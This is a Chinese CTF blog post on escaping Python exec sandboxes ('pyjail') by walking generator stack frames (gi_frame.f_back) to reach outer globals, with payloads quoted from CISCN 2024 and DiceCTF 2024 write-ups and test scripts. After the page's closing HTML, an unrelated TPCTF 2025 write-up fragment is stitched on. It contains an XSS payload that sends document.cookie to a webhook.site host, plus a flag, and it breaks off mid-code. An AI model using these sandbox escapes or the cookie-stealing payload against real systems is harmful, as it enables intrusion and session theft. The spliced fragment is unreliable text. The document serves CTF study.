<span class="k">def</span> <span class="nf">my_generator</span><span class="p">():</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">Generator started, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">1</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After first yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">2</span>
    <span class="nf">print</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">After second yield, frame: </span><span class="si">{</span><span class="n">sys</span><span class="p">.</span><span class="nf">_getframe</span><span class="p">()</span><span class="si">}</span><span class="sh">"</span><span class="p">)</span>
    <span class="k">yield</span> <span class="mi">3</span>

<span class="n">gen</span> <span class="o">=</span> <span class="nf">my_generator</span><span class="p">()</span>

<span class="c1"># 第一次调用 next()，启动生成器
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 1
# 第二次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 2
# 第三次调用 next()，继续执行
</span><span class="nf">print</span><span class="p">(</span><span class="nf">next</span><span class="p">(</span><span class="n">gen</span><span class="p">))</span>  <span class="c1"># 输出: 3
</span>
<span class="c1"># Generator started, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 4, code my_generator&gt;
# 1
# After first yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 6, code my_generator&gt;
# 2
# After second yield, frame: &lt;frame at 0x7fe3333b09e0, file '/mnt/share/project/46_Training/web_security_basic/pyjail-labs/test/test_stack_3.py', line 8, code my_generator&gt;
# 3
</span></pre></td></tr></tbody></table></code></div></div>
<p>每次调用 next() 时，生成器会从上次暂停的位置继续执行，并且它的栈帧保持不变。这表明，在整个生命周期中，生成器的栈帧一直存在，并且保存着它的状态。</p>

<p>我们可以使用 dir 函数来查看生成器的内容</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre></td><td class="rouge-code"><pre><span class="n">g</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">,</span><span class="mi">2</span><span class="p">,</span><span class="mi">3</span><span class="p">])</span>
<span class="nf">dir</span><span class="p">(</span><span class="n">g</span><span class="p">)</span>
<span class="c1"># ['__class__',
#  '__del__',
#  '__delattr__',
#  ... ,
#  'close',
#  'gi_code',
#  'gi_frame',
#  'gi_running',
#  'gi_suspended',
#  'gi_yieldfrom',
#  'send',
#  'throw']
</span><span class="n">g</span><span class="p">.</span><span class="n">gi_frame</span>  <span class="c1"># &lt;frame at 0x102bd4880, file '/code.py', line 1, code &lt;genexpr&gt;&gt;
</span></pre></td></tr></tbody></table></code></div></div>
<p>生成器对象自身也存在一些独有的属性，以 gi_开头:</p>
<ul>
  <li>gi_frame: gi_frame 就是生成器的栈帧，生成器每次执行，栈帧的地址保持不变。</li>
</ul>

<h3 id="生成器栈帧逃逸-payload"><span class="me-2">生成器栈帧逃逸 payload</span><a href="#生成器栈帧逃逸-payload" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>
<p>下面是博客 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的一段抽象逻辑：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">&lt;&lt;用户提供的 Python 代码&gt;&gt;</span><span class="sh">"""</span>
<span class="p">...</span> <span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">)</span>
<span class="p">...</span> <span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<p>用户的代码被丢进exec中执行。经过严格的过滤后，import、魔术方法、builtins 等沙箱逃逸的常用思路都会被堵死。这时候想要逃逸到 exec 环境之外拿到flag，甚至是 RCE，就需要通过栈帧回溯来实现。</p>

<h4 id="payload1"><span class="me-2">payload1</span><a href="#payload1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p>文章 <a href="https://pid-blog.com/article/frame-escape-pyjail#%E7%94%9F%E6%88%90%E5%99%A8%E7%9A%84%E6%A0%88%E5%B8%A7">利用生成器栈帧逃逸 Pyjail | CISCN 2024 mossfern 题解</a> 给出的 payload 如下：</p>

<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="p">[</span><span class="o">*</span><span class="n">q</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># g 现在是 exec 之外的栈帧的 globals 了
# g 是一个 dict，其中包含 flag 变量
</span></pre></td></tr></tbody></table></code></div></div>
<p>要理解上面的表达式，需要明白：</p>
<ol>
  <li>==生成器在初始化时并不会立即执行==。q 初始化之后并不会立即执行，而是到 [*q] 时才执行。因此乍一眼看有语法问题，q 并没有定义啊？但是当其执行时，q 已经是一个生成器对象了。</li>
  <li>f_back 属性用于访问调用栈中的前一个栈帧。</li>
</ol>

<p>因此：</p>
<ul>
  <li>q.gi_frame 是生成器对象 q 的当前栈帧。</li>
  <li>q.gi_frame.f_back 得到的是 exec 函数的栈帧，</li>
  <li>q.gi_frame.f_back.f_back 得到的就是全局栈帧了。</li>
  <li>q.gi_frame.f_back.f_back.f_globals 得到的就是 globals() 函数的内容。</li>
</ul>

<p>builtins 和 locals 也可以同理拿到。</p>

<p>作者提到为什么非得把 q.gi_frame 写在生成器里面？为什么不能写成下面这样：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="mi">1</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span>
</pre></td></tr></tbody></table></code></div></div>

<p>原因在于只有在生成器运行过程中，q.gi_frame.f_back 才不为 None（CPython 中定义的逻辑）。即使 q 已经是一个生成器，但是由于并没有进行解包操作，生成器并没有运行，所以 q.gi_frame.f_back 始终为 None，如果没有解包的话，即使像上面那样写，结果也是 None。</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="n">q</span> <span class="o">=</span> <span class="p">(</span><span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_globals</span> <span class="k">for</span> <span class="n">_</span> <span class="ow">in</span> <span class="p">[</span><span class="mi">1</span><span class="p">])</span>
<span class="n">g</span> <span class="o">=</span> <span class="n">q</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span>
<span class="c1"># None
</span></pre></td></tr></tbody></table></code></div></div>

<p>测试脚本：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">"""</span><span class="s">q = (q.gi_frame.f_back.f_back.f_globals for _ in [1]);g = [*q][0];print(g)</span><span class="sh">"""</span>
<span class="c1"># 对 code 进行严防死守的过滤
</span><span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h4 id="payload2"><span class="me-2">payload2</span><a href="#payload2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4>
<p><a href="https://maplebacon.org/2024/02/dicectf2024-irs/">[DiceCTF 2024] IRS</a> 这篇博客也给出了一个生成器栈帧的 payload：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="k">def</span> <span class="nf">f</span><span class="p">():</span>
    <span class="k">global</span> <span class="n">x</span><span class="p">,</span> <span class="n">frame</span>
    <span class="n">frame</span> <span class="o">=</span> <span class="n">x</span><span class="p">.</span><span class="n">gi_frame</span><span class="p">.</span><span class="n">f_back</span><span class="p">.</span><span class="n">f_back</span>
    <span class="k">yield</span>
<span class="n">x</span> <span class="o">=</span> <span class="nf">f</span><span class="p">()</span>
<span class="n">x</span><span class="p">.</span><span class="nf">send</span><span class="p">(</span><span class="bp">None</span><span class="p">)</span>
<span class="nf">print</span><span class="p">(</span><span class="n">frame</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>
<p>如何理解这段代码：</p>
<ol>
  <li>首先声明了一个生成器 f，
    <ol>
      <li>f 内部声明了全局变量 x 和 frame，意味着会在函数外部对其进行操作。</li>
    </ol>
  </li>
  <li>x = f() 会实例化一个生成器，但由于生成器的延迟加载，此时生成器不会执行。</li>
  <li>x.send(None)：这行代码启动了生成器，并让它执行到第一个 yield 语句。</li>
</ol>

<p>ps: 文章作者这段 payload 与上面那种 payload 的区别再于没有显示定一个生成器，AST 中不会出现 ast.GeneratorExp。</p>

<p>测试代码如下：</p>
<div class="language-py highlighter-rouge"><div class="code-header">
        <span data-label-text="Python"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre></td><td class="rouge-code"><pre><span class="n">flag</span> <span class="o">=</span> <span class="sh">"</span><span class="s">flag{12345}</span><span class="sh">"</span>
<span class="n">code</span> <span class="o">=</span> <span class="sh">'''</span><span class="s">
def f():
    global x, frame
    frame = x.gi_frame.f_back.f_back
    yield
x = f()
x.send(None)
print(frame.f_globals)
</span><span class="sh">'''</span>

<span class="n">compiled_code</span> <span class="o">=</span> <span class="nf">compile</span><span class="p">(</span><span class="n">code</span><span class="p">,</span><span class="sh">"</span><span class="s">&lt;sandbox&gt;</span><span class="sh">"</span><span class="p">,</span> <span class="sh">"</span><span class="s">exec</span><span class="sh">"</span><span class="p">)</span>
<span class="c1"># 又是一段严防死守的过滤
</span><span class="nf">exec</span><span class="p">(</span>
    <span class="n">compiled_code</span><span class="p">,</span>
    <span class="bp">None</span><span class="p">,</span>   <span class="c1"># globals，也可能是其他值
</span>    <span class="bp">None</span>    <span class="c1"># locals，也可能是其他值
</span><span class="p">)</span>
</pre></td></tr></tbody></table></code></div></div>

<h3 id="csicn-2024-mossfern"><span class="me-2">CSICN 2024 mossfern</span><a href="#csicn-2024-mossfern" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<h2 id="参考资料"><span class="me-2">参考资料</span><a href="#参考资料" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<ul>
  <li>
    <div class="table-wrapper"><table>
      <tbody>
        <tr>
          <td>[利用生成器栈帧逃逸 Pyjail</td>
          <td>CISCN 2024 mossfern 题解](https://pid-blog.com/article/frame-escape-pyjail#%E9%A2%98%E8%A7%A3%EF%BC%9Amossfern)</td>
        </tr>
      </tbody>
    </table></div>
  </li>
</ul>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/python/">Python</a>
      </div>
    
    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/pyjail/"
            class="post-tag no-text-decoration"
          >pyjail</a>
        
      </div>
    
    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
      <a href="https://twitter.com/intent/tweet?text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    
      <a href="https://www.facebook.com/sharer/sharer.php?title=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog&u=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    
      <a href="https://t.me/share/url?url=%2Fposts%2Fpyjail-bypass-11-%25E5%2588%25A9%25E7%2594%25A8%25E7%2594%259F%25E6%2588%2590%25E5%2599%25A8%25E6%25A0%2588%2F&text=pyjail%20bypass-11%20%E5%88%A9%E7%94%A8%E7%94%9F%E6%88%90%E5%99%A8%E6%A0%88%E9%80%83%E9%80%B8%20-%20DummyKitty's%20Blog" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    
    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>

          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->

  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        <li class="text-truncate lh-lg">
          <a href="/posts/phpggc-thinkphp-%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/">phpggc thinkphp 利用链分析</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%88%A9%E7%94%A8/">php 反序列化利用</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%A0%BC%E5%BC%8F%E5%9F%BA%E7%A1%80/">php 反序列化格式基础</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%BB%95%E8%BF%87/">php 反序列化绕过</a>
        </li>
      
        <li class="text-truncate lh-lg">
          <a href="/posts/php-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8/">php 反序列化字符逃逸</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->

              <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

            </div>

  <div class="toc-border-cover z-3"></div>
  <section id="toc-wrapper" class="invisible position-sticky ps-0 pe-4 pb-4">
    <h2 class="panel-heading ps-3 pb-2 mb-0">Contents</h2>
    <nav id="toc"></nav>
  </section>

          </aside>
        </div>

        <div class="row">
          <!-- tail -->
          <div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Recommend the other 3 posts according to the tags and categories of the current post. -->

<!-- The total size of related posts -->

<!-- An random integer that bigger than 0 -->

<!-- Equals to TAG_SCORE / {max_categories_hierarchy} -->

  <aside id="related-posts" aria-labelledby="related-label">
    <h3 class="mb-4" id="related-label">Further Reading</h3>
    <nav class="row row-cols-1 row-cols-md-2 row-cols-xl-3 g-4 mb-4">
      
        <article class="col">
          <a href="/posts/QWB-2023-writeup/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1702981788"
  data-df="ll"
  
>
  Dec 19, 2023
</time>

              <h4 class="pt-0 my-2">QWB 2023 Writeup</h4>
              <div class="text-muted">
                <p>WEB
happygame
题目提供了一个 gRPC 服务。gRPC 是一个由 Google 初始开发的高性能、开源的远程过程调用（RPC）框架。网上已有不少针对 gRPC 的安全研究：

  【Black Hat Asia 2021系列分享】自动化挖掘 gRPC 网络接口漏洞
  gRPC内存马研究与查杀 - 先知社区

gRPC 框架如下所示：

可见服务端由 Java 编写。

针...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-04-%E7%BB%95%E8%BF%87%E5%A4%9A%E8%A1%8C%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-04 绕过多行限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过多行限制
绕过多行限制的利用手法通常在限制了单行代...</p>
              </div>
            </div>
          </a>
        </article>
      
        <article class="col">
          <a href="/posts/pyjail-bypass-03-%E7%BB%95%E8%BF%87%E5%91%BD%E5%90%8D%E7%A9%BA%E9%97%B4%E9%99%90%E5%88%B6/" class="post-preview card h-100">
            <div class="card-body">
              <!--
  Date format snippet
  See: ${JS_ROOT}/utils/locale-dateime.js
-->

<time
  
  data-ts="1685442237"
  data-df="ll"
  
>
  May 30, 2023
</time>

              <h4 class="pt-0 my-2">pyjail bypass-03 绕过命名空间限制</h4>
              <div class="text-muted">
                <p>pyjail 沙箱逃逸原理
    绕过删除模块或方法
    绕过基于字符串匹配的过滤
    绕过命名空间限制
    绕过多行限制
    绕过长度限制
    变量覆盖与函数篡改
    绕过 audit hook
    绕过 AST 沙箱
    绕过输出限制
    绕过 opcode 沙箱
    利用生成器栈
  
绕过命名空间限制

部分限制
有些沙箱在构建时使用 e...</p>
              </div>
            </div>
          </a>
        </article>
      
    </nav>
  </aside>
  <!-- #related-posts -->

              <!-- Navigation buttons at the bottom of the post. -->

<nav class="post-navigation d-flex justify-content-between" aria-label="Post Navigation">
  
    <a
      href="/posts/pyjail-bypass-10-%E7%BB%95%E8%BF%87-opcode-%E6%B2%99%E7%AE%B1/"
      class="btn btn-outline-primary"
      aria-label="Older"
    >
      <p>pyjail bypass-10 绕过 opcode 沙箱</p>
    </a>
  
    <a
      href="/posts/TPCTF-2025-web-writeup/"
      class="btn btn-outline-primary"
      aria-label="Newer"
    >
      <p>TPCTF 2025 Web Writeup</p>
    </a>
  
</nav>

            <!-- The Footer -->

<footer
  aria-label="Site Info"
  class="
    d-flex flex-column justify-content-center text-muted
    flex-lg-row justify-content-lg-between align-items-lg-center pb-lg-3
  "
>
  <p>©
    <time>2025</time>

      <a href="https://twitter.com/DummyKitty">DummyKitty</a>.
    
      <span
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author."
      >Some rights reserved.</span>
    
  </p>

  <p>Using the <a
        data-bs-toggle="tooltip"
        data-bs-placement="top"
        title="v7.2.4"
        href="https://github.com/cotes2020/jekyll-theme-chirpy"
        target="_blank"
        rel="noopener"
      >Chirpy</a> theme for <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a>.
  </p>
</footer>

          </div>
        </div>

        <!-- The Search results -->

<div id="search-result-wrapper" class="d-flex justify-content-center d-none">
  <div class="col-11 content">
    <div id="search-hints">
      <!-- The trending tags list -->

  <section>
    <h2 class="panel-heading">Trending Tags</h2>
    <div class="d-flex flex-wrap mt-3 mb-1 me-3">
      
        <a class="post-tag btn btn-outline-primary" href="/tags/deserialization/">Deserialization</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/pyjail/">pyjail</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/thinkphp/">thinkphp</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/xss/">xss</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/debug/">debug</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/prototype-pollution/">prototype-pollution</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/rasp/">RASP</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/0ctf-2023/">0ctf 2023</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/docker/">docker</a>
      
        <a class="post-tag btn btn-outline-primary" href="/tags/info-gathering/">Info gathering</a>
      
    </div>
  </section>

    </div>
    <div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div>
  </div>
</div>

      </div>

      <aside aria-label="Scroll to Top">
        <button id="back-to-top" type="button" class="btn btn-lg btn-box-shadow">
          <i class="fas fa-angle-up"></i>
        </button>
      </aside>
    </div>

    <div id="mask" class="d-none position-fixed w-100 h-100 z-1"></div>

      <aside
  id="notification"
  class="toast"
  role="alert"
  aria-live="assertive"
  aria-atomic="true"
  data-bs-animation="true"
  data-bs-autohide="false"
>
  <div class="toast-header">
    <button
      type="button"
      class="btn-close ms-auto"
      data-bs-dismiss="toast"
      aria-label="Close"
    ></button>
  </div>
  <div class="toast-body text-center pt-0">
    <p class="px-2 mb-3">A new version of content is available.</p>
    <button type="button" class="btn btn-primary" aria-label="Update">
      Update
    </button>
  </div>
</aside>

    <!-- Embedded scripts -->

      <!-- The comments switcher -->

    <!--
  Jekyll Simple Search loader
  See: <https://github.com/christian-fei/Simple-Jekyll-Search>
-->

<script>
  
  document.addEventListener('DOMContentLoaded', () => {
    SimpleJekyllSearch({
      searchInput: document.getElementById('search-input'),
      resultsContainer: document.getElementById('search-results'),
      json: '/assets/js/data/search.json',
      searchResultTemplate: '  <article class="px-1 px-sm-2 px-lg-4 px-xl-0">    <header>      <h2><a href="{url}">{title}</a></h2>      <div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1">        {categories}        {tags}      </div>    </header>    <p>{snippet}</p>  </article>',
      noResultsText: '<p class="mt-5">Oops! No results found.</p>',
      templateMiddleware: function(prop, value, template) {
        if (prop === 'categories') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div class="me-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`;
          }
        }

        if (prop === 'tags') {
          if (value === '') {
            return `${value}`;
          } else {
            return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`;
          }
        }
      }
    });
  });
</script>

  </body>
</html>
img src=x onerror=fetch('
https://webhook.site/c59b785d-cfd5-4936-bcad-e0da7994c7b4?flag='+document.cookie)></style>"}

{"content":"","layoutId":5}

  
TPCTF{AlS0_r3M3M83r_t0_d1SA8l3_daTa_AND_aR1A}

supersqli

使用Django框架编写网站，其配置文件settings.py中存在部分问题：

密钥硬编码，可能可伪造会话、密码重置等
未开启csrf保护！！！

  
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    #'django.middleware.csrf.CsrfViewMiddleware', <===
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

全开放主机配置，易遭受主机头攻击。

  
ALLOWED_HOSTS = ["*"]  # 允许任意域名访问

代码存在两个路由，分别是index/和flag/

  
def index(request:HttpRequest):
    return HttpResponse('Welcome to TPCTF 2025')

def flag(request:HttpRequest):
    if request.method != 'POST':
        return HttpResponse('Welcome to TPCTF 2025')
    username = request.POST.get('username')
    if username != 'admin':
        return HttpResponse('you are not admin.')
